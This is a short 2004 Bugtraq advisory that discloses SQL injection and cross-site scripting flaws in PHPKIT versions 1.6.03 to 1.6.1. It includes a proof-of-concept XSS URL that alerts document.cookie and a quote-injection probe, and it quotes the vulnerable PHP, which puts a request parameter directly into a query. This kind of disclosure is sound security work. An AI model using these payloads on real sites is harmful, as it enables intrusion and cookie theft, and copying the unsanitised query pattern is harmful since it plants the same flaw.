Bugtraq mailing list archives
PHPKIT SQL Injection, XSS
From: Steve <steve01 () chello at>
Date: Mon, 22 Nov 2004 08:07:33 +0100
Author: Steve Date: November 22, 2004 Affected Software:PHP KIT Software Version: 1.6.03 -> 1.6.1 Software URL: http://www.phpkit.deAttack: SQL Injection, allowing people to manipulate the query into pulling data.
XSS ############################################################################################################ What is PHPKIT:PHPKIT is a modular developed Homepage Software which can simple manage contents of,
messages,guest book, forums and more. ############################################################################################################ XSS http://www.target.com/phpkit/popup.php?img="><script>alert(document.cookie)</script> ############################################################################################################ SQL INJECTION http://www.target.com/phpkit/include.php?path=guestbook/print.php&id=1' CODE: <?php if (isset($_REQUEST['id'])) $id=$_REQUEST['id'];$gbookinfo=$DB->fetch_array($DB->query("SELECT * FROM ".$db_tab['gbook']." WHERE gbook_id='".$id."' LIMIT 1"));
eval ("\$site_body.= \"".getTemplate("guestbook/print")."\";"); ?> ############################################################################################################ cya Steve
Current thread:
- PHPKIT SQL Injection, XSS Steve (Nov 22)